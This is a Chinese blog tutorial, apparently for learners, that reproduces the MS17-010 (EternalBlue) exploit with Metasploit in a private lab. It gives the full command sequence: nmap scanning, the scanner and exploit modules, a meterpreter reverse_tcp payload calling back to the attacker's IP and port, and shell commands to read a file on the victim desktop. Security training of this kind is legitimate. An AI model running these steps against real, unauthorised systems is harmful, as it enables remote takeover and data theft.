kali初讲——Metasploit攻击ms17_010复现

最新推荐文章于 2024-04-24 16:37:15 发布
最新推荐文章于 2024-04-24 16:37:15 发布
阅读量1.6k 收藏 21
点赞数 2
分类专栏: kali初学 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49998039/article/details/125273723
版权

Metasploit攻击——ms17_010漏洞利用

文章目录

导论

学习此教程需遵守《中华人民共和国信息安全法》

所有教程仅用于信息安全测试,且在授权的情况下进行,请勿用于其他用途!

一、ms17_010简介

ms17_010漏洞其实就是永恒之蓝,属于一个较早期的windows的一个bug,攻击端口为445端口。
2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
英文为:Eternal Blue,翻译过来就是:永恒之蓝。
其实我们现在使用的电脑,几乎没有这个这个bug了。而且,不久之后,微软公司就针对这个bug发布了漏洞补丁。所以,该漏洞在当前很多系统上已经不存在了。

二、攻击使用模块

本次攻击利用的攻击工具为:Metasploit也就是MSF
主要用到Auxiliary(辅助模块),exploit(攻击模块),payload(攻击载荷),使用辅助模块为MSF中的:

auxiliary/scanner/smb/smb_ms17_010

exploit使用的主要是:

exploit/windows/smb/ms17_010_eternalblue

攻击载荷payload使用:

payload/windows/x64/meterpreter_reverse_tcp

内网测试搭建环境:

攻击机ip:192.168.3.125
靶机ip:192.168.3.127
反弹端口:3333

三、、攻击思路

1、nmap扫描靶机是否存在漏洞,得到漏洞名称
2、通过MSF中的辅助模块,验证漏洞是否存在
3、使用exploit相对应的模块进行攻击
4、设置攻击载荷
5、反弹shell
6、查看权限
7、查看靶机上的文件

四、具体实施

nmap扫描靶机漏洞及开放端口

命令为:nmap --script=vuln -Pn 192.168.3.127
192.168.3.127,为你自己靶机的ip

在这里插入图片描述
新开终端,并进入root账户。
我们在使用Linux的时候,你可以开多个终端。
打开msf

root权限:sudo -i 
打开msf:msfconsole

在这里插入图片描述
查询ms17_010辅助模块

命令:search ms17_010

在这里插入图片描述
打开所需要的辅助模块(auxiliary)

命令:use auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述
查询该辅助模块需要设置的一些参数

命令:options

在这里插入图片描述
我们可以看到,需要设置的参数有:

靶机IP:RHOSTS
攻击端口:RPORT

这里rport(攻击端口)已经设置完成,我们便不在设置

设置所要攻击的主机ip命令:set rhosts 192.168.3.127
设置攻击端口:set rport 445

在这里插入图片描述
设置完成,然后扫描目标ip是否存在该漏洞
在这里插入图片描述
从图中我们可以看出,目标ip存在漏洞ms17_010,并且,得到了目标的系统版本:windows7 professional。
确定目标上包含此漏洞,那我们下一步肯定是利用该漏洞啦!
没错,就是exploit(攻击模块)
查询攻击模块:

命令:search ms17_010

在这里插入图片描述
我们这里使用的是eternalblue(永恒之蓝)

模块:exploit/windows/smb/ms17_010_eternalblue

打开该攻击模块

命令:use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
查看该模块需要设置的参数,就是:options/info

命令:options

在这里插入图片描述
其实这里也是有两个需要设置的参数,和上面一样的

靶机ip:rhosts
端口:rport
分别是:
set rhosts 192.168.3.127
set rport 445

设置完成,我们还需要设置攻击载荷(payload)
先去查询使用的攻击载荷,这里使用的是反弹shell

模块: windows/x64/meterpreter/reverse_tcp

在这里插入图片描述
然后设置payload:

命令:set payload windows/x64/meterpreter/reverse_tcp

然后查看需要设置的参数,命令和上面的一样:options
在这里插入图片描述
查询后开始设置,不过这里需要注意的是,我们这里设置的不是靶机的ip和端口,而是攻击机的ip和端口,这里需要注意。我们在使用msf中,需要注意是rhosts还是lhost,或者rports还是lport,这两个是有区别的,前者为被攻击,后者为攻击。

设置反弹ip:set lhost 192.168.3.125
设置反弹端口:set lport 3333

至此,利用ms17_010漏洞的所有都设置完毕,然后我们当然是进行最后一步,运行所有设置,攻击靶机

命令:run/exploit

在这里插入图片描述
不出意外的话,一稍等个几分钟,应该会返回如下界面
在这里插入图片描述
出现这个界面,说明我们的攻击已经成功了。
然后我们查询系统信息

命令:sysinfo

在这里插入图片描述
一般我们攻击肯定是有目的的攻击
我在我的靶机桌面创建了一个名为test的txt文件,我们下面就去,访问他,其中的内容。
使用windows下的shell
我们直接输入:

命令:shell

然后便切换到了windows的命令行也就是我们平时使用的cmd
在这里插入图片描述
然后我们列出当前文件夹位置,存在的所有文件

命令:dir

在这里插入图片描述
我们都知道,在windows中,桌面其实存在Users下的用户文件夹下面
我这里的用户名为:admin
所以我们使用命令直接切换到admin下

命令:cd Users/admin

在这里插入图片描述
在往下切一级文件目录,我们是不是就进入了桌面文件

命令:cd Desktop

在这里插入图片描述
查看文件内容

命令:more test.txt

在这里插入图片描述

至此,对ms17_010漏洞的复现就讲解完了

总结

其实我们去对目标进行渗透的时候,无非分成下面这几步
1、对目标进行信息收集
2、扫描目标可能存在的的漏洞
3、对漏洞进行测试
4、使用攻击脚本
5、得到想要的结果
当然,实际问题实际分析,要把自己的思维活跃起来!
文中如有错误,请联系笔者修改!
如有侵权,请联系笔者删除!

萌伶
关注
  • 2
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
kali (永恒之蓝MS17_010)漏洞复现
菜菜的博客
05-25 2041
8步完成get shell,需要的机子:渗透机(Linux(kali)一台),靶机(server 2008一台),简单的配置,就可以开始攻击
Metasploitable渗透测试:ms17-010
sc_1999的博客
11-27 849
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。
Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程,具体做什么 -永恒之蓝漏洞
最新发布
天下著书立传者,皆为我师
04-24 1156
渗透测试实战练习1——永恒之蓝漏洞(渗透攻击 Win7 主机并远程执行命令)以及mysql空密码扫描利用(获取mysql数据库中信息)
ms17-010】永恒之蓝漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1764
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用。
ms17-010(永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
Kali Linux 学习日记5 - MS17_010
qq_46081990的博客
03-06 528
若其未开放,可以用命令让其开放:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f。由于防火墙的原因,payload一般喜欢用反向tcp,原理是让靶机往外主动连攻击机:set payload windows/x64/meterpreter/reverse_tcp。搜索ms17_010漏洞:search ms17_010
kali-linux 工具Metasploit离线式攻击使用教程
12-29
在IT安全领域,Kali Linux是一款著名的开源渗透测试操作系统,其中包含了各种安全工具,而Metasploit则是其中的重要组件之一,主要用于进行安全漏洞利用和红队演练。本教程将聚焦于Metasploit的离线攻击使用方法,这...
安卓——Kali_linux操作文档.docx
08-20
【安卓上的Kali Linux安装与配置】 在安卓设备上运行Kali Linux是一种有趣且实用的技术实践,这使得安全研究人员和爱好者能够在移动设备上进行渗透测试和网络安全分析。本指南将详细解释如何在安卓手机上安装并配置...
kali linux 无线攻击——aircrack-ng-附件资源
03-05
kali linux 无线攻击——aircrack-ng-附件资源
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
浅析ms17_010(永恒之蓝)漏洞利用过程及防护措施
qq_24797991的博客
03-27 4030
永恒之蓝勒索病毒漏洞复现及防范
Metasploit工具介绍及ms17010复现
qq_40216188的博客
01-14 2448
Metasploit渗透框架介绍及永恒之蓝复现
使用MSF Console实现MS17-010漏洞利用
Fng的博客
03-30 1434
使用KaliMetasploit Console(MSF Console)工具实现Windows 7 Professional下MS17-010(永恒之蓝)漏洞利用。
MSF-17010(永恒之蓝)复现
身高两米不到的博客
03-17 7754
最近开始学习渗透,永恒之蓝漏洞很出名对此学习记录并且复现 所需环境VMware,两台主机使用NAT模式连接 kali 192.168.249.129 windows7 192.168.249.130 PING命令测试主机连接情况 当时发现kali单方ping不通win7,排查后需要先关闭win7防火墙 输入命令msfconsole 进入msf框架 命令search ms17-010 寻找ms17-010相关漏洞 这里前两个是辅助模块用来帮助探测主机是否存在该漏
永恒之蓝漏洞复现(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之蓝(MS17010)漏洞kali使用MSF进行漏洞复现
weixin_42540999的博客
08-19 8827
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序 今天就来利用KALI进行漏洞的复现 实验准备: 1.win7靶机(未打补丁):192.168.1.141 2.kali攻击机:192
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1747
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
kali复现ms17-010
09-26
要在kali复现ms17-010,可以使用kali中的Metasploit框架来进行操作。首先,你需要使用ms17-010的辅助模块进行扫描,可以使用命令"use auxiliary/scanner/smb/smb_ms17_010"。然后,使用ms17-010攻击模块来执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值